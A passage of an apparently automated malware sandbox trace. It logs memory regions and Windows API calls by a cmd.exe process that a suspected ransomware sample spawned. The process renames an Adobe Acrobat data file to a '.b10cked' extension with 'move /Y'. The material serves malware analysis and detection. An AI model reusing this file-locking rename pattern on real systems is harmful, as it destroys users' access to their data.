(normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17837 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17838 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17839 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17840 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17841 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17842 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 17843 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 17844 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 261 os_tid = 0xa80 [0146.203] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff4c | out: lpSystemTimeAsFileTime=0x28ff4c*(dwLowDateTime=0x91140cc0, dwHighDateTime=0x1d440a9)) [0146.203] GetCurrentProcessId () returned 0xb48 [0146.203] GetCurrentThreadId () returned 0xa80 [0146.203] GetTickCount () returned 0x2d806 [0146.203] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff44 | out: lpPerformanceCount=0x28ff44*=20299252451) returned 1 [0146.204] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.204] __set_app_type (_Type=0x1) [0146.204] __p__fmode () returned 0x76b331f4 [0146.204] __p__commode () returned 0x76b331fc [0146.204] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.204] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.205] GetCurrentThreadId () returned 0xa80 [0146.205] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa80) returned 0x38 [0146.205] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.205] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.205] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.205] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fedc | out: phkResult=0x28fedc*=0x0) returned 0x2 [0146.205] VirtualQuery (in: lpAddress=0x28ff13, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.205] GetConsoleOutputCP () returned 0x1b5 [0146.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.206] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.206] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.206] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.207] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.207] GetEnvironmentStringsW () returned 0x3a0240* [0146.207] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0146.207] GetEnvironmentStringsW () returned 0x3a0240* [0146.207] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0146.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ee4c | out: phkResult=0x28ee4c*=0x40) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0xd0, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x0, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegCloseKey (hKey=0x40) returned 0x0 [0146.208] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ee4c | out: phkResult=0x28ee4c*=0x40) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x0, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x9, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x9, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x9, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegCloseKey (hKey=0x40) returned 0x0 [0146.208] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.208] srand (_Seed=0x5b886374) [0146.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"" [0146.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"" [0146.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.209] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a19a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.209] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.209] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.209] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.209] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.209] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.209] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.209] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.209] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.209] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.209] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.209] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.209] GetEnvironmentStringsW () returned 0x3a2390* [0146.210] FreeEnvironmentStringsW (penv=0x3a2390) returned 1 [0146.210] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.210] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.210] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.210] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.210] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.210] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.210] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.210] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.210] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.210] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.210] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fc18, lpFilePart=0x28fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fc14*="Desktop") returned 0x18 [0146.210] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.210] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f994 | out: lpFindFileData=0x28f994) returned 0x3a0a20 [0146.210] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0146.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f994 | out: lpFindFileData=0x28f994) returned 0x3a0a20 [0146.211] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0146.211] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f994 | out: lpFindFileData=0x28f994) returned 0x3a0a20 [0146.211] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0146.211] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.211] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.211] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.211] GetEnvironmentStringsW () returned 0x3a0240* [0146.211] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0146.211] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.212] GetConsoleOutputCP () returned 0x1b5 [0146.212] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.212] GetUserDefaultLCID () returned 0x409 [0146.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd58, cchData=128 | out: lpLCData="0") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fd58, cchData=128 | out: lpLCData="0") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fd58, cchData=128 | out: lpLCData="1") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.213] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.214] GetConsoleTitleW (in: lpConsoleTitle=0x390950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.214] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.214] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.214] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.215] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.215] _wcsicmp (_String1="move", _String2=")") returned 68 [0146.215] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0146.215] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0146.215] _wcsicmp (_String1="IF", _String2="move") returned -4 [0146.216] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0146.216] _wcsicmp (_String1="REM", _String2="move") returned 5 [0146.216] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0146.220] GetConsoleTitleW (in: lpConsoleTitle=0x28fa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.354] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0146.354] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0146.354] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0146.354] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0146.354] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0146.354] _wcsicmp (_String1="move", _String2="CD") returned 10 [0146.354] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0146.354] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0146.354] _wcsicmp (_String1="move", _String2="REN") returned -5 [0146.354] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0146.354] _wcsicmp (_String1="move", _String2="SET") returned -6 [0146.354] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0146.354] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0146.354] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0146.354] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0146.355] _wcsicmp (_String1="move", _String2="MD") returned 11 [0146.355] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0146.355] _wcsicmp (_String1="move", _String2="RD") returned -5 [0146.355] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0146.355] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0146.355] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0146.355] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0146.355] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0146.355] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0146.355] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0146.355] _wcsicmp (_String1="move", _String2="VER") returned -9 [0146.355] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0146.355] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0146.355] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0146.355] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0146.355] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0146.355] _wcsicmp (_String1="move", _String2="START") returned -6 [0146.355] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0146.355] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0146.355] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0146.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.357] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f80c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f804, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f804*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0146.359] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0146.359] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0146.359] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0146.359] _wcsicmp (_String1="DIRECT~1.ACR", _String2=".") returned 54 [0146.359] _wcsicmp (_String1="DIRECT~1.ACR", _String2="..") returned 54 [0146.359] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\direct~1.acr")) returned 0x2020 [0146.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a20c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.360] SetErrorMode (uMode=0x0) returned 0x0 [0146.360] SetErrorMode (uMode=0x1) returned 0x0 [0146.360] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", nBufferLength=0x104, lpBuffer=0x28f194, lpFilePart=0x28f17c | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", lpFilePart=0x28f17c*="DIRECT~1.ACR") returned 0x43 [0146.360] SetErrorMode (uMode=0x0) returned 0x1 [0146.360] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security")) returned 0x2010 [0146.360] _wcsicmp (_String1="DIRECT~1.ACR", _String2=".") returned 54 [0146.360] _wcsicmp (_String1="DIRECT~1.ACR", _String2="..") returned 54 [0146.360] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\direct~1.acr")) returned 0x2020 [0146.360] SetErrorMode (uMode=0x0) returned 0x0 [0146.360] SetErrorMode (uMode=0x1) returned 0x0 [0146.360] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", nBufferLength=0x104, lpBuffer=0x28f610, lpFilePart=0x28f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", lpFilePart=0x28f3a8*="DIRECT~1.ACR") returned 0x43 [0146.361] SetErrorMode (uMode=0x0) returned 0x1 [0146.361] SetErrorMode (uMode=0x0) returned 0x0 [0146.361] SetErrorMode (uMode=0x1) returned 0x0 [0146.361] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", nBufferLength=0x104, lpBuffer=0x28f818, lpFilePart=0x28f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", lpFilePart=0x28f3a8*="directories.acrodata.b10cked") returned 0x53 [0146.361] SetErrorMode (uMode=0x0) returned 0x1 [0146.361] SetLastError (dwErrCode=0x0) [0146.361] 